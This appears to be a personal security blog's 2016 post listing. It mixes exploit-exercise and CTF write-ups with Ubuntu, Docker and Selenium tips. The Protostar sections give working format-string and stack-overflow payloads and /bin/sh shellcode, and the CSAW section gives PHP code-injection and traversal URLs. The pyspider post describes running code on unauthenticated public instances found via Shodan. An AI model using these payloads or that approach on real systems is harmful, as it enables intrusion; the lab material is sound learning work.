Posts

Showing posts from 2016

Exploit Exercises - Format String

Format1:
Find the padding that puts the target address at the end of the stack dump:
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Swap the last %x for %n to write:
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
Direct parameter access (%N$n selects the argument by index, so the stack walk is not needed):
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`

Format2 requires writing a specific value to the address, so the padding has to bring printf's byte counter to that value before the %n fires:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
Layout: | Address | Value | Padding | %n

Direct parameter access (4 address bytes + 60 padding bytes are printed when the %n fires):
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 bytes to a specified address, one byte per %n (the writes land at addr, addr+1, addr+2 and addr+3, each padded so the low byte of the counter equals the wanted byte). POC: python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x&qu…
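The padding arithmetic behind the three payloads above, as an added Python example (not code from the original post): single_n_width is the Format2 case (one %n, the counter must equal the wanted value), n_widths is the Format3 case (four overlapping %n writes, one byte each), simulate_writes applies those writes to a constructed 8-byte window to confirm the result, and build_payload emits a Format3-style string using direct parameter access. The address 0x080496f4 is the one in the Format3 POC; the value 0x01025544 and the argument index 12 are illustrative assumptions, not taken from the page.

```python
import struct


def single_n_width(value, count, min_width=8):
    """Format2 style: a single %n must see the byte counter equal to `value`.
    `count` is how many bytes are printed before the padded conversion
    (4 for an address at the front of the buffer)."""
    width = value - count
    if width < min_width:
        raise ValueError("value too small to reach with a single write")
    return width


def n_widths(value, count, min_width=8):
    """Format3 style: field widths for four overlapping %n writes that store
    `value` little-endian, one byte per write, at addr, addr+1, addr+2, addr+3.
    Each width makes (count + width) % 256 equal the next byte of `value`."""
    widths = []
    for i in range(4):
        byte = (value >> (8 * i)) & 0xFF
        pad = (byte - count) % 256
        # A %x of a 32-bit word prints up to 8 chars on its own, so a width
        # below that would not control the counter: go round once more.
        if pad < min_width:
            pad += 256
        widths.append(pad)
        count += pad
    return widths


def simulate_writes(value, count):
    """Apply the four %n writes to a constructed 8-byte window (the target plus
    the 4 bytes after it) and return the 32-bit value left at its start.
    Each %n stores a full 4-byte int, so write i also clobbers bytes i+1..i+3;
    the later writes repair those, and the last write spills 3 bytes past the
    target, so the bytes after the target must be writable and expendable."""
    mem = bytearray(8)
    for i, width in enumerate(n_widths(value, count)):
        count += width
        mem[i:i + 4] = struct.pack("<I", count & 0xFFFFFFFF)
    return struct.unpack("<I", mem[:4])[0]


def build_payload(addr, value, arg_index):
    """Format3-style payload: the four target addresses first, then one
    '%<width>x%<k>$n' per byte. arg_index is the printf argument number at
    which the first address sits on the stack (found with the %x walk)."""
    payload = b"".join(struct.pack("<I", addr + i) for i in range(4))
    for i, width in enumerate(n_widths(value, len(payload))):
        payload += b"%%%dx%%%d$n" % (width, arg_index + i)
    return payload


if __name__ == "__main__":
    print(single_n_width(64, 4))          # the %60u of the Format2 payload
    print(n_widths(0x01025544, 16))
    print(hex(simulate_writes(0x01025544, 16)))
    print(build_payload(0x080496F4, 0x01025544, 12))
```

The check a practitioner wants before firing the real payload is simulate_writes: if it does not return the value you asked for, the widths are wrong (usually a pad below 8 or a miscounted prefix), not the binary.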

Exploit Exercises - Protostar Stack 7

In this level, the app checks that the return address does not start with 0xb, so it refuses to return straight into the stack. So I return to a pop pop ret gadget in the binary instead: the two pops skip 8 bytes of junk, and the gadget's ret pops the stack address that follows and jumps there (that second ret is never checked).
Found pop pop ret at: 0x08048492
This is the payload:
| "A" * 80 | pop pop ret address | 8 bytes junk | address of NOP sled | NOP sled (absorbs small shifts of the stack address) | shellcode |
This is the shellcode:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
Load the POC into gdb, debug, set breakpoints, etc. I found the NOP sled starts at: 0xbffff698. Stack addresses seen under gdb shift a little once the binary runs outside it (different environment), which is what the sled is for. OK, build the POC:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) (the trailing cat keeps stdin open so the shell stays usable.) And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "…
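The payload layout above as an added Python builder (example code, not from the original post). The gadget and sled addresses are the ones the post found; ret_passes_filter models the level's check the way the post describes it (a return address whose top nibble is 0xb is refused), which is an assumption about the exact mask the binary uses.

```python
import struct

# Shellcode from the post (55 bytes): close fd 0, open /dev/tty so it becomes
# the new stdin, then execve("/bin//sh").
SHELLCODE = (
    b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9"
    b"\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
    b"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
)

POP_POP_RET = 0x08048492   # gadget address from the post
NOP_SLED = 0xBFFFF698      # stack address the post found in gdb


def ret_passes_filter(ret):
    """Model of the level's check as the post describes it: return addresses
    starting with 0xb (stack memory) are refused. Assumption: the binary's
    exact mask may differ, but the gadget/stack split is the same."""
    return (ret >> 28) != 0xB


def build_payload(overflow=80, nops=40, gadget=POP_POP_RET, sled=NOP_SLED,
                  shellcode=SHELLCODE):
    """Layout: padding | pop pop ret | 8 junk bytes | sled address | NOPs | shellcode.
    The overwritten return address is the gadget, which passes the filter.
    Its two pops consume the 8 junk bytes, and its ret pops the sled address,
    which is never filtered because the check ran once, on the first ret."""
    if not ret_passes_filter(gadget):
        raise ValueError("gadget address would be rejected by the filter")
    return (b"A" * overflow
            + struct.pack("<I", gadget)
            + b"C" * 8
            + struct.pack("<I", sled)
            + b"\x90" * nops
            + shellcode)


def rets_popped(payload, overflow=80):
    """The two addresses the rets will pop: the first from the saved return
    slot, the second 12 bytes later (4 for the gadget slot + 8 junk)."""
    first = struct.unpack_from("<I", payload, overflow)[0]
    second = struct.unpack_from("<I", payload, overflow + 4 + 8)[0]
    return first, second


if __name__ == "__main__":
    import sys
    sys.stdout.buffer.write(build_payload() + b"\n")
```

rets_popped is the offset check to run before debugging in gdb: if it does not return (gadget, sled), the padding or junk length is off and the sled address will never reach the gadget's ret.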

Exploit Exercises - Protostar Stack 6

In my free time I had a go at exploit-exercises. Today I played stack level 6 and learned something about return-to-libc.
Use gdb to disassemble:
#gdb -q /opt/protostar/bin/stack6
(gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :   mov    %ebp,%esp
0x08048507 :   pop    %ebp
0x08048508 :   ret  
End of assembler dump.
(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 : push   %ebp
0x08048485 : mov    %esp,%ebp
0x08048487 : sub    $0x68,%esp
0x0804848a : mov    $0x80485d0,%eax
0x0804848f :        mov    %eax,(%esp)
0x08048492 :        call   0x80483c0
0x08048497 :        mov    0x8049720,%eax
0x0804849c :        mov    %eax,(%esp)
0x0804849f :        call   0x80483b0
0x080484a4 :        lea    -0x4c(%ebp),%eax
0x080484a7 :        mov    %eax,(%esp)
0x080484aa :        call   0x8048380
0x080484af :…

Some experience when use Docker

This week my job was to set up ELK with Suricata. I chose Docker as the platform to run everything, and picked up some experience with it:
Use docker-compose. It is a good deployment model for production: build && run.
Install docker-compose via pip.
Use build to create your own customized image (your start-up distro).
I used compose file version 2 syntax; note the differences between versions, for example network versus net.
Use network_mode / --net host if you need to monitor traffic on all interfaces.
You cannot use the cd command in a Dockerfile; use WORKDIR. Read the Dockerfile documentation very carefully.
With links, the linked container is started first. You can also start it manually and start the main container afterwards; make sure it is up.
The container's command must hold the foreground (the tty), e.g. suricata -c xxx or python manage.py runserver 0.0.0.0:8080; otherwise the container exits straight away.
----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be conti…

Tampermonkey HelloWorld and create menuCommand

Today I needed to write a script with Tampermonkey. It was hard :(.
To write a hello world, create a new script.
Edit the header and add:
// @connect      *
// @match        http://*/*
// @match        https://*/*
You can edit author, homepage, etc. Note that @match on every site plus @connect * lets the script read any page and talk to any host; narrow both to the sites you actually need.
Put your code in the main body below the header comment. I used console.log().
I needed a button in the menu, so I used GM_registerMenuCommand:
Edit the header, remove @grant none and add: // @grant        GM_registerMenuCommand

You will see a new menu entry in Tampermonkey.

[Writeup] CSAW CTF 2016

mfw (125)
Main URL:
http://web.chal.csaw.io:8000

Fuzzing it is easy: the page parameter is concatenated into a PHP string that gets evaluated (the assert() hinted at by the flag), so a single quote breaks out and the rest runs as PHP:
http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27

Play with the flag:
http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27
flag{3vald_@ss3rt_1s_best_a$$ert}


wtf.sh 1 (150)

http://web.chal.csaw.io:8001
Register an account and log in.
Create a post, view the post.
Fuzzing it, I found directory traversal (WTF? traversal again).
Fuzzing to http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess it can read every file in that directory, like cat * :)).

I found some interesting functions (after using a decoder to view the code in a readable form). Note that passwords are stored as a plain unsalted shasum (SHA-1) of the password:

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}
# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}
# generate a random token, base64 encoded
# on GNU base64 wraps at 76 …

RCE in Pyspider

Today I read an article about exploiting debug mode in Werkzeug. It is old, but very interesting. Searching Shodan, I found about 30 websites running pyspider. Pyspider is an open-source Python crawler; you can download and install it from: https://github.com/binux/pyspider
It has one problem: no authentication. Anyone can access it.

Clicking on a project takes you to debug mode, where you can edit the project's Python code. So you can use it to execute code. It is RCE.


This is my POC (pasted into the debug editor and run):
import subprocess
p = subprocess.Popen(["id"], stdout=subprocess.PIPE)
output, err = p.communicate()
print(output)

Install Skype and Facebook Message Plugin for Ubuntu

On Windows it is easy to install the Facebook and Skype apps. On Ubuntu I wanted one app for both services, so I chose Pidgin.
1. Install the Facebook plugin:
We use purple-facebook:
sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/ /' >> /etc/apt/sources.list.d/jgeboski.list"
cd /tmp && wget  http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install purple-facebook
Add your Facebook account in Manage Accounts.
2. Install the Skype plugin:
We use skypeweb:
sudo apt-get install libpurple-dev libjson-glib-dev cmake gcc
git clone https://github.com/EionRobb/skype4pidgin.git
cd skype4pidgin/skypeweb
mkdir build
cd build
cmake ..
cpack
sudo dpkg -i skypeweb-1.1.0-Linux.deb
Add your Skype account in Manage Accounts.


Use a macro for Anti-CSRF tokens in Burp Suite

When I was reading a paper about Burp Suite tricks, it talked about Burp Suite macros and how to use them to handle anti-CSRF tokens.
I tried it with this demo: http://www.businessinfo.co.uk/labs/csrf_defend/form_token_demo_stage2.php
The first request gets the token from the HTML (formtoken), and the POST request (request 2) sends it back to be checked.
Now we use a macro to fetch the token automatically and add it to the POST data.
Make sure both requests and responses are in the HTTP proxy history, and that intercept is off.
Go to Project options (version > 1.7) or Options (<= 1.6, I am not sure). I used the Pro version. Choose the Sessions tab. Under Session handling rules, add a new rule:
Type your rule name, like "Anti CSRF Rule for xx.com". Under Rule actions, choose Add with the type "Run a post-request macro". You will see the action editor.
Add a new macro by clicking Add; the macro editor and macro recorder windows open.
Now, in the macro recorder you must choose the 2 requests: request 1 is the request that gets the token, and request 2 is the action request that uses the token (select both).
Clic…

Automount partition in Ubuntu with fstab

Before Ubuntu I had Windows installed, so I have 2 NTFS partitions. They are not auto-mounted; they only mount when I click the local disk icon.
I need them mounted automatically, because many applications live on those partitions.
First, find the UUID of each partition in /dev/disk/by-uuid.
Then edit /etc/fstab and add:
UUID=327E4E257E4DE1E9   /mnt/sdb1/      ntfs    rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000   0       0
UUID=38D822D9D82294E2   /mnt/sdb2/      ntfs    rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000   0       0

with the UUIDs I found; uid is the id of my user (id -u). To add the location to the menu bar, use "Bookmark this location" in Gnome.

Some experience while working with ElasticSearch, Angular

This week I joined a project that needs a web portal. My hobby is Python, so I chose Flask and Angular JS, with Bootstrap for the CSS template.
My DB is Elasticsearch. I don't make raw HTTP requests to query ES; I use the python elasticsearch library.
Using ES, I had some problems.
1. Sorting in ES (note: the filtered query used here was deprecated in ES 2.0 and removed in 5.0; newer versions put the filter inside a bool query):
data = self.es.search(index=self.indexName, doc_type=self.docType,
                      body={"query": {
                                "filtered": {
                                    "query": {
                                        "bool": {
                                            "must": mustDict,
                                        },
                                    }
                                }
                            },
                            "size": size, "from": from_, "sort": {"timestamp":…

Popup interaction in Selenium

While developing the AWATT tool, I hit this problem: after a click, a popup alert window shows and must be confirmed (accept or dismiss) to continue.
You cannot use a Selenium selector to control it. This is the solution (updated for Selenium 4, where switch_to_alert() and find_element_by_xpath() no longer exist):

from selenium import webdriver
from selenium.webdriver.common.by import By
import time

url = "http://www.javascripter.net/faq/alert.htm"
driver = webdriver.Firefox()
driver.get(url)
element = driver.find_element(By.XPATH, "//input[@type='button']")
element.click()
time.sleep(2)                   # give the alert time to appear before switching to it
alert = driver.switch_to.alert  # raises NoAlertPresentException if there is none
alert.accept()
# alert.dismiss()
driver.quit()

File Upload with Selenium

Yesterday my brother asked me: "How do you upload a file automatically with Selenium?". Today I had free time to solve it.
Try this code. I used the Python binding (Selenium 4 API; a file input is filled by sending the local path to it, no click on the file dialog is needed):
from selenium import webdriver
from selenium.webdriver.common.by import By

url = "https://encodable.com/uploaddemo/"
driver = webdriver.Firefox()
driver.get(url)
element = driver.find_element(By.ID, "uploadname1")
element.send_keys("/home/habachnam/a.txt")
driver.quit()

Install Metasploit Ubuntu quick way

Install Metasploit on Ubuntu (read msfinstall before running it: it is a script fetched over the network that installs packages as root):

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Now you can use apt-get update and apt-get install metasploit-framework to update Metasploit, because the installer adds Rapid7's apt repository.


Get a Unity-like appmenu (global menu) in Ubuntu Gnome Session Fallback

When I use Ubuntu, the first thing I do is install gnome-session-fallback, because I like the classic app menu.
But Hopper Disassembler only shows its app menu under Unity. I found a way to display the app menu in gnome-session-fallback:
sudo apt-get install indicator-applet-appmenu
After installing it, move the mouse to the top panel, press Super + Alt + right-click, choose Add to panel, select indicator-applet-appmenu, and choose Add. Now you can use the Unity app menu.